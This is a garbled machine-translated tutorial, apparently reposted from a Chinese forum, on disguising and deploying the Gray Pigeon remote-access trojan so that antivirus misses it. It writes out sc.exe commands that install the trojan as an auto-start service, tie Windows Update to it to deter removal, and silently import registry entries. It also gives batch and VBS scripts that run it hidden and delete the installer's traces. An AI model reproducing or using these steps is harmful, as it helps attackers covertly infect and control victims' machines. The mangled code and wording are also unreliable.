A simple method is used to create a gray pigeon that will not be killed by anti-virus software.

Source: Internet
Author: User

Soon after the official launch of this method, I was inspired by the Radmin configuration and had no technical skills. I never dared to say it to everyone for fear of jokes, so laruence would not have to watch it.

Now let's talk about the subject:

Our goal is:

Go through official kill and click it to actively defend against the undead pigeon

Preparation tools:

Pigeon Server

IcoSprite icon changer;

SC .exe adds and deletes a change tool;

Winrar

Program features:

Self-extract mode, double-click

Production process:
1. Configure the pigeon server by yourself. Do not fill in [startup Item settings] here during configuration, do not write it into the registry, or start it with a service. Others are what you like.

2. Use SC to create a service

Run CMD. EXE and run it in the system32 directory.

SC .exe create huigezi BinPath = "% systemroot % \ system32 \ gezi.exe" type = own type = interact start = auto DisplayName = "gezi"
'This statement uses SC to create a service named huigezi, the path Binpath is "% systemroot % \ system32 \ gezi.exe", and the type is own and interact, start is automatic, and DisplayName is "gezi ".

SC .exe descript_ion huigezi "undead pigeon"
'Change the description of the huigezi service to "no dead pigeon"

SC config wuauserv depend = huigezi
'Configure huigezi to make the wuauserv service dependent on this service (wuauserv can be changed to another service as per your preferences. Here wuauserv is the automatic Update service of the system on the Windows Update Website ).

The purpose here is to confuse the administrator so that it does not dare to stop our generated services easily. You can also add more points on your own.

3. export these data from the Registry. My personal experience is: Registry monitoring, such as rising star and clicking bar, will not trigger alarms on the imported registry. We will name it 1.reg.

4. Create a BAT file and name it update. bat.

@ Regedit/s % systemroot % \ system32 \ 1.reg
@ % Systemroot % \ system32 \ gezi.exe
@ Del/q/f/s % systemroot % \ system32 \ 1.reg
@ Del/q/f/s % systemroot % \ system32 \ Update. vbs
@ Del/q/f/s % systemroot % \ system32 \ Update. bat

5. Create a vbs and name it update. vbs.

The purpose is to make the content in bat Run in quiet mode, so that the cmd window can jump out and a lot of concealment is added.

Write the following code:

On Error Resume Next
Set wshshell = createobject ("wscript _. shell ")
A = wshshell. run ("cmd.exe/C % systemroot % \ system32 \ Update. bat", 0, TRUE)

  • 1
  • 2
  • Next Page
[Content navigation]
Page 1st: a simple way to create a gray pigeon that is not killed by anti-virus software Page 2nd: a simple way to create a gray pigeon that is not killed by anti-virus software

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.